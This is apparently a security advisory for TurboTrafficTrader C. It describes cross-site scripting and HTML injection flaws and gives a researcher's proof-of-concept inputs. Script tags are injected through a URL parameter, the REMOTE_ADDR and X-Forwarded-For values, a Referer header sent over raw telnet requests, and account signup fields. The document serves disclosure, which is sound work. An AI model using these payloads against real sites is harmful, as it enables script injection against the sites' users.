|
|
TurboTrafficTrader C Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
No exploit is required, but Kaloyan Olegov Georgiev has supplied the following proof of concept code and examples: http://www.example.com/cgi-bin/ttt-out?link=testing%20%3Cscript%3Ealert('from_browser_insert');%3C/script%3E http://www.example.com/cgi-bin/ttt-out?link=testing%20<script>alert('from_browser_insert');</script> export REMOTE_ADDR="127.0.0.1<script>alert('ip_inject');</script>" ./ttt-in will load one bad record for IP export HTTP_X_FORWARDED_FOR="10.0.0.1<script>alert('proxy insertion');</script>" ./ttt-in will load an XXSed proxy record Raw connection example: telnet www.example.com 80 Trying www.example.com... Connected to www.example.com. Escape character is '^]'. GET /cgi-bin/ttt-in HTTP/1.1 X-Forwarded-For: 192.168.0.1<script>alert('proxy_insert');</script> Host: www.example.com telnet www.example.com 80 Trying www.example.com... Connected to www.example.com. Escape character is '^]'. GET /cgi-bin/ttt-in HTTP/1.1 X-Forwarded-For: 192.168.0.6<script>alert('proxy_insert');</script> Referer: http://www.referrer.com"<script>alert('referrer_inject');</script>" Host: www.example.com When signing up for a new account: Site name = Name"<script>window.open('http://www.example.com');</script> Site URL = http://www.example.com"<script>alert('name_inject');</script> Webmaster e-mail = email@example.com"<script>alert('email_inject');</script> Webmaster ICQ = 123456"<script>alert('ICQ_inject');</script> |
|
Privacy Statement |